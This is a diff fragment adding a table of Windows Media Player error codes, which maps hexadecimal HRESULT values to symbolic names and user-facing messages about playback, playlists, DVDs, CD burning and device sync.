+ 0xC00D1037: ("NS_E_WMP_JPG_BAD_PRECISION", "Internal JPEG Library error. Unsupported JPEG data precision."),
+ 0xC00D1038: ("NS_E_WMP_JPG_CCIR601_NOTIMPL", "JPEG CCIR601 not supported."),
+ 0xC00D1039: ("NS_E_WMP_JPG_NO_IMAGE_IN_FILE", "No image found in JPEG file."),
+ 0xC00D103A: ("NS_E_WMP_JPG_READ_ERROR", "Could not read JPEG file."),
+ 0xC00D103B: ("NS_E_WMP_JPG_FRACT_SAMPLE_NOTIMPL", "JPEG Fractional sampling not supported."),
+ 0xC00D103C: ("NS_E_WMP_JPG_IMAGE_TOO_BIG", "JPEG image too large. Maximum image size supported is 65500 X 65500."),
+ 0xC00D103D: ("NS_E_WMP_JPG_UNEXPECTED_ENDOFFILE", "Unexpected end of file reached in JPEG file."),
+ 0xC00D103E: ("NS_E_WMP_JPG_SOF_UNSUPPORTED", "Unsupported JPEG SOF marker found."),
+ 0xC00D103F: ("NS_E_WMP_JPG_UNKNOWN_MARKER", "Unknown JPEG marker found."),
+ 0xC00D1044: ("NS_E_WMP_FAILED_TO_OPEN_IMAGE", "Windows Media Player cannot display the picture file. The player either does not support the picture type or the picture is corrupted."),
+ 0xC00D1049: ("NS_E_WMP_DAI_SONGTOOSHORT", "Windows Media Player cannot compute a Digital Audio Id for the song. It is too short."),
+ 0xC00D104A: ("NS_E_WMG_RATEUNAVAILABLE", "Windows Media Player cannot play the file at the requested speed."),
+ 0xC00D104B: ("NS_E_WMG_PLUGINUNAVAILABLE", "The rendering or digital signal processing plug-in cannot be instantiated."),
+ 0xC00D104C: ("NS_E_WMG_CANNOTQUEUE", "The file cannot be queued for seamless playback."),
+ 0xC00D104D: ("NS_E_WMG_PREROLLLICENSEACQUISITIONNOTALLOWED", "Windows Media Player cannot download media usage rights for a file in the playlist."),
+ 0xC00D104E: ("NS_E_WMG_UNEXPECTEDPREROLLSTATUS", "Windows Media Player encountered an error while trying to queue a file."),
+ 0xC00D1051: ("NS_E_WMG_INVALID_COPP_CERTIFICATE", "Windows Media Player cannot play the protected file. The Player cannot verify that the connection to your video card is secure. Try installing an updated device driver for your video card."),
+ 0xC00D1052: ("NS_E_WMG_COPP_SECURITY_INVALID", "Windows Media Player cannot play the protected file. The Player detected that the connection to your hardware might not be secure."),
+ 0xC00D1053: ("NS_E_WMG_COPP_UNSUPPORTED", "Windows Media Player output link protection is unsupported on this system."),
+ 0xC00D1054: ("NS_E_WMG_INVALIDSTATE", "Operation attempted in an invalid graph state."),
+ 0xC00D1055: ("NS_E_WMG_SINKALREADYEXISTS", "A renderer cannot be inserted in a stream while one already exists."),
+ 0xC00D1056: ("NS_E_WMG_NOSDKINTERFACE", "The Windows Media SDK interface needed to complete the operation does not exist at this time."),
+ 0xC00D1057: ("NS_E_WMG_NOTALLOUTPUTSRENDERED", "Windows Media Player cannot play a portion of the file because it requires a codec that either could not be downloaded or that is not supported by the Player."),
+ 0xC00D1058: ("NS_E_WMG_FILETRANSFERNOTALLOWED", "File transfer streams are not allowed in the standalone Player."),
+ 0xC00D1059: ("NS_E_WMR_UNSUPPORTEDSTREAM", "Windows Media Player cannot play the file. The Player does not support the format you are trying to play."),
+ 0xC00D105A: ("NS_E_WMR_PINNOTFOUND", "An operation was attempted on a pin that does not exist in the DirectShow filter graph."),
+ 0xC00D105B: ("NS_E_WMR_WAITINGONFORMATSWITCH", "Specified operation cannot be completed while waiting for a media format change from the SDK."),
+ 0xC00D105C: ("NS_E_WMR_NOSOURCEFILTER", "Specified operation cannot be completed because the source filter does not exist."),
+ 0xC00D105D: ("NS_E_WMR_PINTYPENOMATCH", "The specified type does not match this pin."),
+ 0xC00D105E: ("NS_E_WMR_NOCALLBACKAVAILABLE", "The WMR Source Filter does not have a callback available."),
+ 0xC00D1062: ("NS_E_WMR_SAMPLEPROPERTYNOTSET", "The specified property has not been set on this sample."),
+ 0xC00D1063: ("NS_E_WMR_CANNOT_RENDER_BINARY_STREAM", "A plug-in is required to correctly play the file. To determine if the plug-in is available to download, click Web Help."),
+ 0xC00D1064: ("NS_E_WMG_LICENSE_TAMPERED", "Windows Media Player cannot play the file because your media usage rights are corrupted. If you previously backed up your media usage rights, try restoring them."),
+ 0xC00D1065: ("NS_E_WMR_WILLNOT_RENDER_BINARY_STREAM", "Windows Media Player cannot play protected files that contain binary streams."),
+ 0xC00D1068: ("NS_E_WMX_UNRECOGNIZED_PLAYLIST_FORMAT", "Windows Media Player cannot play the playlist because it is not valid."),
+ 0xC00D1069: ("NS_E_ASX_INVALIDFORMAT", "Windows Media Player cannot play the playlist because it is not valid."),
+ 0xC00D106A: ("NS_E_ASX_INVALIDVERSION", "A later version of Windows Media Player might be required to play this playlist."),
+ 0xC00D106B: ("NS_E_ASX_INVALID_REPEAT_BLOCK", "The format of a REPEAT loop within the current playlist file is not valid."),
+ 0xC00D106C: ("NS_E_ASX_NOTHING_TO_WRITE", "Windows Media Player cannot save the playlist because it does not contain any items."),
+ 0xC00D106D: ("NS_E_URLLIST_INVALIDFORMAT", "Windows Media Player cannot play the playlist because it is not valid."),
+ 0xC00D106E: ("NS_E_WMX_ATTRIBUTE_DOES_NOT_EXIST", "The specified attribute does not exist."),
+ 0xC00D106F: ("NS_E_WMX_ATTRIBUTE_ALREADY_EXISTS", "The specified attribute already exists."),
+ 0xC00D1070: ("NS_E_WMX_ATTRIBUTE_UNRETRIEVABLE", "Cannot retrieve the specified attribute."),
+ 0xC00D1071: ("NS_E_WMX_ITEM_DOES_NOT_EXIST", "The specified item does not exist in the current playlist."),
+ 0xC00D1072: ("NS_E_WMX_ITEM_TYPE_ILLEGAL", "Items of the specified type cannot be created within the current playlist."),
+ 0xC00D1073: ("NS_E_WMX_ITEM_UNSETTABLE", "The specified item cannot be set in the current playlist."),
+ 0xC00D1074: ("NS_E_WMX_PLAYLIST_EMPTY", "Windows Media Player cannot perform the requested action because the playlist does not contain any items."),
+ 0xC00D1075: ("NS_E_MLS_SMARTPLAYLIST_FILTER_NOT_REGISTERED", "The specified auto playlist contains a filter type that is either not valid or is not installed on this computer."),
+ 0xC00D1076: ("NS_E_WMX_INVALID_FORMAT_OVER_NESTING", "Windows Media Player cannot play the file because the associated playlist contains too many nested playlists."),
+ 0xC00D107C: ("NS_E_WMPCORE_NOSOURCEURLSTRING", "Windows Media Player cannot find the file. Verify that the path is typed correctly. If it is, the file might not exist in the specified location, or the computer where the file is stored might not be available."),
+ 0xC00D107D: ("NS_E_WMPCORE_COCREATEFAILEDFORGITOBJECT", "Failed to create the Global Interface Table."),
+ 0xC00D107E: ("NS_E_WMPCORE_FAILEDTOGETMARSHALLEDEVENTHANDLERINTERFACE", "Failed to get the marshaled graph event handler interface."),
+ 0xC00D107F: ("NS_E_WMPCORE_BUFFERTOOSMALL", "Buffer is too small for copying media type."),
+ 0xC00D1080: ("NS_E_WMPCORE_UNAVAILABLE", "The current state of the Player does not allow this operation."),
+ 0xC00D1081: ("NS_E_WMPCORE_INVALIDPLAYLISTMODE", "The playlist manager does not understand the current play mode (for example, shuffle or normal)."),
+ 0xC00D1086: ("NS_E_WMPCORE_ITEMNOTINPLAYLIST", "Windows Media Player cannot play the file because it is not in the current playlist."),
+ 0xC00D1087: ("NS_E_WMPCORE_PLAYLISTEMPTY", "There are no items in the playlist. Add items to the playlist, and then try again."),
+ 0xC00D1088: ("NS_E_WMPCORE_NOBROWSER", "The web page cannot be displayed because no web browser is installed on your computer."),
+ 0xC00D1089: ("NS_E_WMPCORE_UNRECOGNIZED_MEDIA_URL", "Windows Media Player cannot find the specified file. Verify the path is typed correctly. If it is, the file does not exist in the specified location, or the computer where the file is stored is not available."),
+ 0xC00D108A: ("NS_E_WMPCORE_GRAPH_NOT_IN_LIST", "Graph with the specified URL was not found in the prerolled graph list."),
+ 0xC00D108B: ("NS_E_WMPCORE_PLAYLIST_EMPTY_OR_SINGLE_MEDIA", "Windows Media Player cannot perform the requested operation because there is only one item in the playlist."),
+ 0xC00D108C: ("NS_E_WMPCORE_ERRORSINKNOTREGISTERED", "An error sink was never registered for the calling object."),
+ 0xC00D108D: ("NS_E_WMPCORE_ERRORMANAGERNOTAVAILABLE", "The error manager is not available to respond to errors."),
+ 0xC00D108E: ("NS_E_WMPCORE_WEBHELPFAILED", "The Web Help URL cannot be opened."),
+ 0xC00D108F: ("NS_E_WMPCORE_MEDIA_ERROR_RESUME_FAILED", "Could not resume playing next item in playlist."),
+ 0xC00D1090: ("NS_E_WMPCORE_NO_REF_IN_ENTRY", "Windows Media Player cannot play the file because the associated playlist does not contain any items or the playlist is not valid."),
+ 0xC00D1091: ("NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_NAME_EMPTY", "An empty string for playlist attribute name was found."),
+ 0xC00D1092: ("NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_NAME_ILLEGAL", "A playlist attribute name that is not valid was found."),
+ 0xC00D1093: ("NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_VALUE_EMPTY", "An empty string for a playlist attribute value was found."),
+ 0xC00D1094: ("NS_E_WMPCORE_WMX_LIST_ATTRIBUTE_VALUE_ILLEGAL", "An illegal value for a playlist attribute was found."),
+ 0xC00D1095: ("NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_NAME_EMPTY", "An empty string for a playlist item attribute name was found."),
+ 0xC00D1096: ("NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_NAME_ILLEGAL", "An illegal value for a playlist item attribute name was found."),
+ 0xC00D1097: ("NS_E_WMPCORE_WMX_LIST_ITEM_ATTRIBUTE_VALUE_EMPTY", "An illegal value for a playlist item attribute was found."),
+ 0xC00D1098: ("NS_E_WMPCORE_LIST_ENTRY_NO_REF", "The playlist does not contain any items."),
+ 0xC00D1099: ("NS_E_WMPCORE_MISNAMED_FILE", "Windows Media Player cannot play the file. The file is either corrupted or the Player does not support the format you are trying to play."),
+ 0xC00D109A: ("NS_E_WMPCORE_CODEC_NOT_TRUSTED", "The codec downloaded for this file does not appear to be properly signed, so it cannot be installed."),
+ 0xC00D109B: ("NS_E_WMPCORE_CODEC_NOT_FOUND", "Windows Media Player cannot play the file. One or more codecs required to play the file could not be found."),
+ 0xC00D109C: ("NS_E_WMPCORE_CODEC_DOWNLOAD_NOT_ALLOWED", "Windows Media Player cannot play the file because a required codec is not installed on your computer. To try downloading the codec, turn on the \"Download codecs automatically\" option."),
+ 0xC00D109D: ("NS_E_WMPCORE_ERROR_DOWNLOADING_PLAYLIST", "Windows Media Player encountered a problem while downloading the playlist. For additional assistance, click Web Help."),
+ 0xC00D109E: ("NS_E_WMPCORE_FAILED_TO_BUILD_PLAYLIST", "Failed to build the playlist."),
+ 0xC00D109F: ("NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_NONE", "Playlist has no alternates to switch into."),
+ 0xC00D10A0: ("NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_EXHAUSTED", "No more playlist alternates available to switch to."),
+ 0xC00D10A1: ("NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_NAME_NOT_FOUND", "Could not find the name of the alternate playlist to switch into."),
+ 0xC00D10A2: ("NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_MORPH_FAILED", "Failed to switch to an alternate for this media."),
+ 0xC00D10A3: ("NS_E_WMPCORE_PLAYLIST_ITEM_ALTERNATE_INIT_FAILED", "Failed to initialize an alternate for the media."),
+ 0xC00D10A4: ("NS_E_WMPCORE_MEDIA_ALTERNATE_REF_EMPTY", "No URL specified for the roll over Refs in the playlist file."),
+ 0xC00D10A5: ("NS_E_WMPCORE_PLAYLIST_NO_EVENT_NAME", "Encountered a playlist with no name."),
+ 0xC00D10A6: ("NS_E_WMPCORE_PLAYLIST_EVENT_ATTRIBUTE_ABSENT", "A required attribute in the event block of the playlist was not found."),
+ 0xC00D10A7: ("NS_E_WMPCORE_PLAYLIST_EVENT_EMPTY", "No items were found in the event block of the playlist."),
+ 0xC00D10A8: ("NS_E_WMPCORE_PLAYLIST_STACK_EMPTY", "No playlist was found while returning from a nested playlist."),
+ 0xC00D10A9: ("NS_E_WMPCORE_CURRENT_MEDIA_NOT_ACTIVE", "The media item is not active currently."),
+ 0xC00D10AB: ("NS_E_WMPCORE_USER_CANCEL", "Windows Media Player cannot perform the requested action because you chose to cancel it."),
+ 0xC00D10AC: ("NS_E_WMPCORE_PLAYLIST_REPEAT_EMPTY", "Windows Media Player encountered a problem with the playlist. The format of the playlist is not valid."),
+ 0xC00D10AD: ("NS_E_WMPCORE_PLAYLIST_REPEAT_START_MEDIA_NONE", "Media object corresponding to start of a playlist repeat block was not found."),
+ 0xC00D10AE: ("NS_E_WMPCORE_PLAYLIST_REPEAT_END_MEDIA_NONE", "Media object corresponding to the end of a playlist repeat block was not found."),
+ 0xC00D10AF: ("NS_E_WMPCORE_INVALID_PLAYLIST_URL", "The playlist URL supplied to the playlist manager is not valid."),
+ 0xC00D10B0: ("NS_E_WMPCORE_MISMATCHED_RUNTIME", "Windows Media Player cannot play the file because it is corrupted."),
+ 0xC00D10B1: ("NS_E_WMPCORE_PLAYLIST_IMPORT_FAILED_NO_ITEMS", "Windows Media Player cannot add the playlist to the library because the playlist does not contain any items."),
+ 0xC00D10B2: ("NS_E_WMPCORE_VIDEO_TRANSFORM_FILTER_INSERTION", "An error has occurred that could prevent the changing of the video contrast on this media."),
+ 0xC00D10B3: ("NS_E_WMPCORE_MEDIA_UNAVAILABLE", "Windows Media Player cannot play the file. If the file is located on the Internet, connect to the Internet. If the file is located on a removable storage card, insert the storage card."),
+ 0xC00D10B4: ("NS_E_WMPCORE_WMX_ENTRYREF_NO_REF", "The playlist contains an ENTRYREF for which no href was parsed. Check the syntax of playlist file."),
+ 0xC00D10B5: ("NS_E_WMPCORE_NO_PLAYABLE_MEDIA_IN_PLAYLIST", "Windows Media Player cannot play any items in the playlist. To find information about the problem, click the Now Playing tab, and then click the icon next to each file in the List pane."),
+ 0xC00D10B6: ("NS_E_WMPCORE_PLAYLIST_EMPTY_NESTED_PLAYLIST_SKIPPED_ITEMS", "Windows Media Player cannot play some or all of the items in the playlist because the playlist is nested."),
+ 0xC00D10B7: ("NS_E_WMPCORE_BUSY", "Windows Media Player cannot play the file at this time. Try again later."),
+ 0xC00D10B8: ("NS_E_WMPCORE_MEDIA_CHILD_PLAYLIST_UNAVAILABLE", "There is no child playlist available for this media item at this time."),
+ 0xC00D10B9: ("NS_E_WMPCORE_MEDIA_NO_CHILD_PLAYLIST", "There is no child playlist for this media item."),
+ 0xC00D10BA: ("NS_E_WMPCORE_FILE_NOT_FOUND", "Windows Media Player cannot find the file. The link from the item in the library to its associated digital media file might be broken. To fix the problem, try repairing the link or removing the item from the library."),
+ 0xC00D10BB: ("NS_E_WMPCORE_TEMP_FILE_NOT_FOUND", "The temporary file was not found."),
+ 0xC00D10BC: ("NS_E_WMDM_REVOKED", "Windows Media Player cannot sync the file because the device needs to be updated."),
+ 0xC00D10BD: ("NS_E_DDRAW_GENERIC", "Windows Media Player cannot play the video because there is a problem with your video card."),
+ 0xC00D10BE: ("NS_E_DISPLAY_MODE_CHANGE_FAILED", "Windows Media Player failed to change the screen mode for full-screen video playback."),
+ 0xC00D10BF: ("NS_E_PLAYLIST_CONTAINS_ERRORS", "Windows Media Player cannot play one or more files. For additional information, right-click an item that cannot be played, and then click Error Details."),
+ 0xC00D10C0: ("NS_E_CHANGING_PROXY_NAME", "Cannot change the proxy name if the proxy setting is not set to custom."),
+ 0xC00D10C1: ("NS_E_CHANGING_PROXY_PORT", "Cannot change the proxy port if the proxy setting is not set to custom."),
+ 0xC00D10C2: ("NS_E_CHANGING_PROXY_EXCEPTIONLIST", "Cannot change the proxy exception list if the proxy setting is not set to custom."),
+ 0xC00D10C3: ("NS_E_CHANGING_PROXYBYPASS", "Cannot change the proxy bypass flag if the proxy setting is not set to custom."),
+ 0xC00D10C4: ("NS_E_CHANGING_PROXY_PROTOCOL_NOT_FOUND", "Cannot find the specified protocol."),
+ 0xC00D10C5: ("NS_E_GRAPH_NOAUDIOLANGUAGE", "Cannot change the language settings. Either the graph has no audio or the audio only supports one language."),
+ 0xC00D10C6: ("NS_E_GRAPH_NOAUDIOLANGUAGESELECTED", "The graph has no audio language selected."),
+ 0xC00D10C7: ("NS_E_CORECD_NOTAMEDIACD", "This is not a media CD."),
+ 0xC00D10C8: ("NS_E_WMPCORE_MEDIA_URL_TOO_LONG", "Windows Media Player cannot play the file because the URL is too long."),
+ 0xC00D10C9: ("NS_E_WMPFLASH_CANT_FIND_COM_SERVER", "To play the selected item, you must install the Macromedia Flash Player. To download the Macromedia Flash Player, go to the Adobe website."),
+ 0xC00D10CA: ("NS_E_WMPFLASH_INCOMPATIBLEVERSION", "To play the selected item, you must install a later version of the Macromedia Flash Player. To download the Macromedia Flash Player, go to the Adobe website."),
+ 0xC00D10CB: ("NS_E_WMPOCXGRAPH_IE_DISALLOWS_ACTIVEX_CONTROLS", "Windows Media Player cannot play the file because your Internet security settings prohibit the use of ActiveX controls."),
+ 0xC00D10CC: ("NS_E_NEED_CORE_REFERENCE", "The use of this method requires an existing reference to the Player object."),
+ 0xC00D10CD: ("NS_E_MEDIACD_READ_ERROR", "Windows Media Player cannot play the CD. The disc might be dirty or damaged."),
+ 0xC00D10CE: ("NS_E_IE_DISALLOWS_ACTIVEX_CONTROLS", "Windows Media Player cannot play the file because your Internet security settings prohibit the use of ActiveX controls."),
+ 0xC00D10CF: ("NS_E_FLASH_PLAYBACK_NOT_ALLOWED", "Flash playback has been turned off in Windows Media Player."),
+ 0xC00D10D0: ("NS_E_UNABLE_TO_CREATE_RIP_LOCATION", "Windows Media Player cannot rip the CD because a valid rip location cannot be created."),
+ 0xC00D10D1: ("NS_E_WMPCORE_SOME_CODECS_MISSING", "Windows Media Player cannot play the file because a required codec is not installed on your computer."),
+ 0xC00D10D2: ("NS_E_WMP_RIP_FAILED", "Windows Media Player cannot rip one or more tracks from the CD."),
+ 0xC00D10D3: ("NS_E_WMP_FAILED_TO_RIP_TRACK", "Windows Media Player encountered a problem while ripping the track from the CD. For additional assistance, click Web Help."),
+ 0xC00D10D4: ("NS_E_WMP_ERASE_FAILED", "Windows Media Player encountered a problem while erasing the disc. For additional assistance, click Web Help."),
+ 0xC00D10D5: ("NS_E_WMP_FORMAT_FAILED", "Windows Media Player encountered a problem while formatting the device. For additional assistance, click Web Help."),
+ 0xC00D10D6: ("NS_E_WMP_CANNOT_BURN_NON_LOCAL_FILE", "This file cannot be burned to a CD because it is not located on your computer."),
+ 0xC00D10D7: ("NS_E_WMP_FILE_TYPE_CANNOT_BURN_TO_AUDIO_CD", "It is not possible to burn this file type to an audio CD. Windows Media Player can burn the following file types to an audio CD: WMA, MP3, or WAV."),
+ 0xC00D10D8: ("NS_E_WMP_FILE_DOES_NOT_FIT_ON_CD", "This file is too large to fit on a disc."),
+ 0xC00D10D9: ("NS_E_WMP_FILE_NO_DURATION", "It is not possible to determine if this file can fit on a disc because Windows Media Player cannot detect the length of the file. Playing the file before burning may enable the Player to detect the file length."),
+ 0xC00D10DA: ("NS_E_PDA_FAILED_TO_BURN", "Windows Media Player encountered a problem while burning the file to the disc. For additional assistance, click Web Help."),
+ 0xC00D10DC: ("NS_E_FAILED_DOWNLOAD_ABORT_BURN", "Windows Media Player cannot burn the audio CD because some items in the list that you chose to buy could not be downloaded from the online store."),
+ 0xC00D10DD: ("NS_E_WMPCORE_DEVICE_DRIVERS_MISSING", "Windows Media Player cannot play the file. Try using Windows Update or Device Manager to update the device drivers for your audio and video cards. For information about using Windows Update or Device Manager, see Windows Help."),
+ 0xC00D1126: ("NS_E_WMPIM_USEROFFLINE", "Windows Media Player has detected that you are not connected to the Internet. Connect to the Internet, and then try again."),
+ 0xC00D1127: ("NS_E_WMPIM_USERCANCELED", "The attempt to connect to the Internet was canceled."),
+ 0xC00D1128: ("NS_E_WMPIM_DIALUPFAILED", "The attempt to connect to the Internet failed."),
+ 0xC00D1129: ("NS_E_WINSOCK_ERROR_STRING", "Windows Media Player has encountered an unknown network error."),
+ 0xC00D1130: ("NS_E_WMPBR_NOLISTENER", "No window is currently listening to Backup and Restore events."),
+ 0xC00D1131: ("NS_E_WMPBR_BACKUPCANCEL", "Your media usage rights were not backed up because the backup was canceled."),
+ 0xC00D1132: ("NS_E_WMPBR_RESTORECANCEL", "Your media usage rights were not restored because the restoration was canceled."),
+ 0xC00D1133: ("NS_E_WMPBR_ERRORWITHURL", "An error occurred while backing up or restoring your media usage rights. A required web page cannot be displayed."),
+ 0xC00D1134: ("NS_E_WMPBR_NAMECOLLISION", "Your media usage rights were not backed up because the backup was canceled."),
+ 0xC00D1137: ("NS_E_WMPBR_DRIVE_INVALID", "Windows Media Player cannot restore your media usage rights from the specified location. Choose another location, and then try again."),
+ 0xC00D1138: ("NS_E_WMPBR_BACKUPRESTOREFAILED", "Windows Media Player cannot backup or restore your media usage rights."),
+ 0xC00D1158: ("NS_E_WMP_CONVERT_FILE_FAILED", "Windows Media Player cannot add the file to the library."),
+ 0xC00D1159: ("NS_E_WMP_CONVERT_NO_RIGHTS_ERRORURL", "Windows Media Player cannot add the file to the library because the content provider prohibits it. For assistance, contact the company that provided the file."),
+ 0xC00D115A: ("NS_E_WMP_CONVERT_NO_RIGHTS_NOERRORURL", "Windows Media Player cannot add the file to the library because the content provider prohibits it. For assistance, contact the company that provided the file."),
+ 0xC00D115B: ("NS_E_WMP_CONVERT_FILE_CORRUPT", "Windows Media Player cannot add the file to the library. The file might not be valid."),
+ 0xC00D115C: ("NS_E_WMP_CONVERT_PLUGIN_UNAVAILABLE_ERRORURL", "Windows Media Player cannot add the file to the library. The plug-in required to add the file is not installed properly. For assistance, click Web Help to display the website of the company that provided the file."),
+ 0xC00D115D: ("NS_E_WMP_CONVERT_PLUGIN_UNAVAILABLE_NOERRORURL", "Windows Media Player cannot add the file to the library. The plug-in required to add the file is not installed properly. For assistance, contact the company that provided the file."),
+ 0xC00D115E: ("NS_E_WMP_CONVERT_PLUGIN_UNKNOWN_FILE_OWNER", "Windows Media Player cannot add the file to the library. The plug-in required to add the file is not installed properly. For assistance, contact the company that provided the file."),
+ 0xC00D1160: ("NS_E_DVD_DISC_COPY_PROTECT_OUTPUT_NS", "Windows Media Player cannot play this DVD. Try installing an updated driver for your video card or obtaining a newer video card."),
+ 0xC00D1161: ("NS_E_DVD_DISC_COPY_PROTECT_OUTPUT_FAILED", "This DVD's resolution exceeds the maximum allowed by your component video outputs. Try reducing your screen resolution to 640 x 480, or turn off analog component outputs and use a VGA connection to your monitor."),
+ 0xC00D1162: ("NS_E_DVD_NO_SUBPICTURE_STREAM", "Windows Media Player cannot display subtitles or highlights in DVD menus. Reinstall the DVD decoder or contact the DVD drive manufacturer to obtain an updated decoder."),
+ 0xC00D1163: ("NS_E_DVD_COPY_PROTECT", "Windows Media Player cannot play this DVD because there is a problem with digital copy protection between your DVD drive, decoder, and video card. Try installing an updated driver for your video card."),
+ 0xC00D1164: ("NS_E_DVD_AUTHORING_PROBLEM", "Windows Media Player cannot play the DVD. The disc was created in a manner that the Player does not support."),
+ 0xC00D1165: ("NS_E_DVD_INVALID_DISC_REGION", "Windows Media Player cannot play the DVD because the disc prohibits playback in your region of the world. You must obtain a disc that is intended for your geographic region."),
+ 0xC00D1166: ("NS_E_DVD_COMPATIBLE_VIDEO_CARD", "Windows Media Player cannot play the DVD because your video card does not support DVD playback."),
+ 0xC00D1167: ("NS_E_DVD_MACROVISION", "Windows Media Player cannot play this DVD because it is not possible to turn on analog copy protection on the output display. Try installing an updated driver for your video card."),
+ 0xC00D1168: ("NS_E_DVD_SYSTEM_DECODER_REGION", "Windows Media Player cannot play the DVD because the region assigned to your DVD drive does not match the region assigned to your DVD decoder."),
+ 0xC00D1169: ("NS_E_DVD_DISC_DECODER_REGION", "Windows Media Player cannot play the DVD because the disc prohibits playback in your region of the world. You must obtain a disc that is intended for your geographic region."),
+ 0xC00D116A: ("NS_E_DVD_NO_VIDEO_STREAM", "Windows Media Player cannot play DVD video. You might need to adjust your Windows display settings. Open display settings in Control Panel, and then try lowering your screen resolution and color quality settings."),
+ 0xC00D116B: ("NS_E_DVD_NO_AUDIO_STREAM", "Windows Media Player cannot play DVD audio. Verify that your sound card is set up correctly, and then try again."),
+ 0xC00D116C: ("NS_E_DVD_GRAPH_BUILDING", "Windows Media Player cannot play DVD video. Close any open files and quit any other programs, and then try again. If the problem persists, restart your computer."),
+ 0xC00D116D: ("NS_E_DVD_NO_DECODER", "Windows Media Player cannot play the DVD because a compatible DVD decoder is not installed on your computer."),
+ 0xC00D116E: ("NS_E_DVD_PARENTAL", "Windows Media Player cannot play the scene because it has a parental rating higher than the rating that you are authorized to view."),
+ 0xC00D116F: ("NS_E_DVD_CANNOT_JUMP", "Windows Media Player cannot skip to the requested location on the DVD."),
+ 0xC00D1170: ("NS_E_DVD_DEVICE_CONTENTION", "Windows Media Player cannot play the DVD because it is currently in use by another program. Quit the other program that is using the DVD, and then try again."),
+ 0xC00D1171: ("NS_E_DVD_NO_VIDEO_MEMORY", "Windows Media Player cannot play DVD video. You might need to adjust your Windows display settings. Open display settings in Control Panel, and then try lowering your screen resolution and color quality settings."),
+ 0xC00D1172: ("NS_E_DVD_CANNOT_COPY_PROTECTED", "Windows Media Player cannot rip the DVD because it is copy protected."),
+ 0xC00D1173: ("NS_E_DVD_REQUIRED_PROPERTY_NOT_SET", "One of more of the required properties has not been set."),
+ 0xC00D1174: ("NS_E_DVD_INVALID_TITLE_CHAPTER", "The specified title and/or chapter number does not exist on this DVD."),
+ 0xC00D1176: ("NS_E_NO_CD_BURNER", "Windows Media Player cannot burn the files because the Player cannot find a burner. If the burner is connected properly, try using Windows Update to install the latest device driver."),
+ 0xC00D1177: ("NS_E_DEVICE_IS_NOT_READY", "Windows Media Player does not detect storage media in the selected device. Insert storage media into the device, and then try again."),
+ 0xC00D1178: ("NS_E_PDA_UNSUPPORTED_FORMAT", "Windows Media Player cannot sync this file. The Player might not support the file type."),
+ 0xC00D1179: ("NS_E_NO_PDA", "Windows Media Player does not detect a portable device. Connect your portable device, and then try again."),
+ 0xC00D117A: ("NS_E_PDA_UNSPECIFIED_ERROR", "Windows Media Player encountered an error while communicating with the device. The storage card on the device might be full, the device might be turned off, or the device might not allow playlists or folders to be created on it."),
+ 0xC00D117B: ("NS_E_MEMSTORAGE_BAD_DATA", "Windows Media Player encountered an error while burning a CD."),
+ 0xC00D117C: ("NS_E_PDA_FAIL_SELECT_DEVICE", "Windows Media Player encountered an error while communicating with a portable device or CD drive."),
+ 0xC00D117D: ("NS_E_PDA_FAIL_READ_WAVE_FILE", "Windows Media Player cannot open the WAV file."),
+ 0xC00D117E: ("NS_E_IMAPI_LOSSOFSTREAMING", "Windows Media Player failed to burn all the files to the CD. Select a slower recording speed, and then try again."),
+ 0xC00D117F: ("NS_E_PDA_DEVICE_FULL", "There is not enough storage space on the portable device to complete this operation. Delete some unneeded files on the portable device, and then try again."),
+ 0xC00D1180: ("NS_E_FAIL_LAUNCH_ROXIO_PLUGIN", "Windows Media Player cannot burn the files. Verify that your burner is connected properly, and then try again. If the problem persists, reinstall the Player."),
+ 0xC00D1181: ("NS_E_PDA_DEVICE_FULL_IN_SESSION", "Windows Media Player did not sync some files to the device because there is not enough storage space on the device."),
+ 0xC00D1182: ("NS_E_IMAPI_MEDIUM_INVALIDTYPE", "The disc in the burner is not valid. Insert a blank disc into the burner, and then try again."),
+ 0xC00D1183: ("NS_E_PDA_MANUALDEVICE", "Windows Media Player cannot perform the requested action because the device does not support sync."),
+ 0xC00D1184: ("NS_E_PDA_PARTNERSHIPNOTEXIST", "To perform the requested action, you must first set up sync with the device."),
+ 0xC00D1185: ("NS_E_PDA_CANNOT_CREATE_ADDITIONAL_SYNC_RELATIONSHIP", "You have already created sync partnerships with 16 devices. To create a new sync partnership, you must first end an existing partnership."),
+ 0xC00D1186: ("NS_E_PDA_NO_TRANSCODE_OF_DRM", "Windows Media Player cannot sync the file because protected files cannot be converted to the required quality level or file format."),
+ 0xC00D1187: ("NS_E_PDA_TRANSCODECACHEFULL", "The folder that stores converted files is full. Either empty the folder or increase its size, and then try again."),
+ 0xC00D1188: ("NS_E_PDA_TOO_MANY_FILE_COLLISIONS", "There are too many files with the same name in the folder on the device. Change the file name or sync to a different folder."),
+ 0xC00D1189: ("NS_E_PDA_CANNOT_TRANSCODE", "Windows Media Player cannot convert the file to the format required by the device."),
+ 0xC00D118A: ("NS_E_PDA_TOO_MANY_FILES_IN_DIRECTORY", "You have reached the maximum number of files your device allows in a folder. If your device supports playback from subfolders, try creating subfolders on the device and storing some files in them."),
+ 0xC00D118B: ("NS_E_PROCESSINGSHOWSYNCWIZARD", "Windows Media Player is already trying to start the Device Setup Wizard."),
+ 0xC00D118C: ("NS_E_PDA_TRANSCODE_NOT_PERMITTED", "Windows Media Player cannot convert this file format. If an updated version of the codec used to compress this file is available, install it and then try to sync the file again."),
+ 0xC00D118D: ("NS_E_PDA_INITIALIZINGDEVICES", "Windows Media Player is busy setting up devices. Try again later."),
+ 0xC00D118E: ("NS_E_PDA_OBSOLETE_SP", "Your device is using an outdated driver that is no longer supported by Windows Media Player. For additional assistance, click Web Help."),
+ 0xC00D118F: ("NS_E_PDA_TITLE_COLLISION", "Windows Media Player cannot sync the file because a file with the same name already exists on the device. Change the file name or try to sync the file to a different folder."),
+ 0xC00D1190: ("NS_E_PDA_DEVICESUPPORTDISABLED", "Automatic and manual sync have been turned off temporarily. To sync to a device, restart Windows Media Player."),
+ 0xC00D1191: ("NS_E_PDA_NO_LONGER_AVAILABLE", "This device is not available. Connect the device to the computer, and then try again."),
